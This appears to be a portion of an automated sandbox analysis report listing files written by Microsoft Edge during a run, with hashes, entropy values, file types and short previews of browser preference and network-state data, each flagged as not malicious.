                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):111
                                Entropy (8bit):4.718418993774295
                                Encrypted:false
                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                MD5:285252A2F6327D41EAB203DC2F402C67
                                SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                Malicious:false
                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):188
                                Entropy (8bit):5.423404609678128
                                Encrypted:false
                                SSDEEP:3:YWRAWNjBSVVLTRn0xmuRA9E+L3x8HQXwlm9yJUA6XcIR6RX77XMqGwmvXjz2SQ:YWyWN1iL50xHA9vh8wXwlmUUAnIMp5sO
                                MD5:6833E2FEEACF2930174137246FC7E09F
                                SHA1:7707DD22D2CFD3C3B79D727C93AE1D3DFD90B307
                                SHA-256:839EB286A9A424BFB655D9DA050BE4CAE90B3DE4894CFE1F352919B551F17C0C
                                SHA-512:B987F42C327EA83EE824E0E9BBC2AE5727CBB3B8DF29659C7E11798E24D5F8A94A05644200B6B57754876050E805EEAB90A0DAC437296BFED54C49535AF133C0
                                Malicious:false
                                Preview:{"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):7726
                                Entropy (8bit):4.913560853760498
                                Encrypted:false
                                SSDEEP:96:sViqlPJ1Ceb9bsYrdNYYedY5Th6Cp9/x+6M8muecmAeChe4zvrU2X6gS5AtEHb:sViUJIYrdNYYAYPpj+FVAFUFJf
                                MD5:C2FD71D365B08C40732A1355CFC108E6
                                SHA1:CA930C6582B237A1B29847E549D424FA3560A0C4
                                SHA-256:1BBDDB749B49D5844A2563019618A9796A01EF16F1769DD4A2473D55AD4B9F62
                                SHA-512:0955FABBFD3DC198E84C669480BB5A4C5575A0F01BACE919FE796FE260182F98CE34AB0D652240A30248C4853228065CA7045956A4DC937D17D344720171C891
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"last_update_date":"133407612
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):7726
                                Entropy (8bit):4.913560853760498
                                Encrypted:false
                                SSDEEP:96:sViqlPJ1Ceb9bsYrdNYYedY5Th6Cp9/x+6M8muecmAeChe4zvrU2X6gS5AtEHb:sViUJIYrdNYYAYPpj+FVAFUFJf
                                MD5:C2FD71D365B08C40732A1355CFC108E6
                                SHA1:CA930C6582B237A1B29847E549D424FA3560A0C4
                                SHA-256:1BBDDB749B49D5844A2563019618A9796A01EF16F1769DD4A2473D55AD4B9F62
                                SHA-512:0955FABBFD3DC198E84C669480BB5A4C5575A0F01BACE919FE796FE260182F98CE34AB0D652240A30248C4853228065CA7045956A4DC937D17D344720171C891
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"last_update_date":"133407612
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):7726
                                Entropy (8bit):4.913560853760498
                                Encrypted:false
                                SSDEEP:96:sViqlPJ1Ceb9bsYrdNYYedY5Th6Cp9/x+6M8muecmAeChe4zvrU2X6gS5AtEHb:sViUJIYrdNYYAYPpj+FVAFUFJf
                                MD5:C2FD71D365B08C40732A1355CFC108E6
                                SHA1:CA930C6582B237A1B29847E549D424FA3560A0C4
                                SHA-256:1BBDDB749B49D5844A2563019618A9796A01EF16F1769DD4A2473D55AD4B9F62
                                SHA-512:0955FABBFD3DC198E84C669480BB5A4C5575A0F01BACE919FE796FE260182F98CE34AB0D652240A30248C4853228065CA7045956A4DC937D17D344720171C891
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"last_update_date":"133407612
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):33
                                Entropy (8bit):4.051821770808046
                                Encrypted:false
                                SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                Malicious:false
                                Preview:{"preferred_apps":[],"version":1}
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):25185
                                Entropy (8bit):5.571248798884802
                                Encrypted:false
                                SSDEEP:768:BSHFsSWPgSfQL8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFnfuirwJUpAtuY:BSHFsSWPgSfQLu1jaCfuHJ3tP
                                MD5:4DD26FDB524CEB4E2D6F55896BBB46FF
                                SHA1:06EF12D66C78D0C9F0F8A31C5E9BE7A7955271C7
                                SHA-256:050931C18850E3FC2EFBE142970E4379EF9B4933E55EF0D0D25B1F18BD79A719
                                SHA-512:05291E21B3254C84CBB4B0930B6F46F9B86F450661103850810D8F80C7ECBEDA31BA5F021700DE67B22A180398E54BD2B586F243CD4BA300DAEA4CBD04ABF8FC
                                Malicious:false
                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13361265751977205","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13361265751977205","location":5,"ma
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):25185
                                Entropy (8bit):5.571248798884802
                                Encrypted:false
                                SSDEEP:768:BSHFsSWPgSfQL8F1+UoAYDCx9Tuqh0VfUC9xbog/OVFnfuirwJUpAtuY:BSHFsSWPgSfQLu1jaCfuHJ3tP
                                MD5:4DD26FDB524CEB4E2D6F55896BBB46FF
                                SHA1:06EF12D66C78D0C9F0F8A31C5E9BE7A7955271C7
                                SHA-256:050931C18850E3FC2EFBE142970E4379EF9B4933E55EF0D0D25B1F18BD79A719
                                SHA-512:05291E21B3254C84CBB4B0930B6F46F9B86F450661103850810D8F80C7ECBEDA31BA5F021700DE67B22A180398E54BD2B586F243CD4BA300DAEA4CBD04ABF8FC
                                Malicious:false
                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13361265751977205","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13361265751977205","location":5,"ma
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.01057775872642915
                                Encrypted:false
                                SSDEEP:3:MsFl:/F
                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):8.280239615765425E-4
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.011852361981932763
                                Encrypted:false
                                SSDEEP:3:MsHlDll:/H
                                MD5:0962291D6D367570BEE5454721C17E11
                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.012340643231932763
                                Encrypted:false
                                SSDEEP:3:MsGl3ll:/y
                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):524656
                                Entropy (8bit):4.6377872329235307E-4
                                Encrypted:false
                                SSDEEP:3:LsulY+O:LsnP
                                MD5:90062536F5DF13F6BCAEDF567B7DE370
                                SHA1:2CEE71F4DA9E1102317E507A1C91507E75C5FAFB
                                SHA-256:FBD4A18F89202D27C272514B46C056B6F73FD29F674154A1F4754AC9A596DD89
                                SHA-512:D4C106AC98BC3340B91362F5F052C64321F80E86A38439E60CD73E557CB72CB0EC119FEF1F7121DFE3BD7C034119BF89C619C40829F4CB8C4A748D2797E10774
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.01057775872642915
                                Encrypted:false
                                SSDEEP:3:MsFl:/F
                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):0.0012471779557650352
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.011852361981932763
                                Encrypted:false
                                SSDEEP:3:MsHlDll:/H
                                MD5:0962291D6D367570BEE5454721C17E11
                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.012340643231932763
                                Encrypted:false
                                SSDEEP:3:MsGl3ll:/y
                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):262512
                                Entropy (8bit):8.81240594570408E-4
                                Encrypted:false
                                SSDEEP:3:LsNlct:Ls3ct
                                MD5:3C22E8E2F62A6CB0D25440CAB50D3833
                                SHA1:76BFACC42D4983F7658D284F337B02002836613A
                                SHA-256:1084BC3E51819D23E8C65A4470DCCB62D2F08A3D8930A1567EF3DB3200C29D42
                                SHA-512:B47EFC2803198932802CA77B1EF0E68FDC83C4BB3540DA478AFC43129F8AD6DC0831530E7095F22CA6D2025A610A32BA95A8B6F387F64E97F713BF117B331325
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):0.0012471779557650352
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                Malicious:false
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):4.1275671571169275
                                Encrypted:false
                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                MD5:20D4B8FA017A12A108C87F540836E250
                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                Malicious:false
                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):193
                                Entropy (8bit):4.864047146590611
                                Encrypted:false
                                SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                Malicious:false
                                Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                Category:dropped
                                Size (bytes):36864
                                Entropy (8bit):0.555790634850688
                                Encrypted:false
                                SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):40
                                Entropy (8bit):4.1275671571169275
                                Encrypted:false
                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                MD5:20D4B8FA017A12A108C87F540836E250
                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                Malicious:false
                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:H:H
                                MD5:D751713988987E9331980363E24189CE
                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                Malicious:false
                                Preview:[]
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                Category:dropped
                                Size (bytes):11755
                                Entropy (8bit):5.190465908239046
                                Encrypted:false
                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                Malicious:false
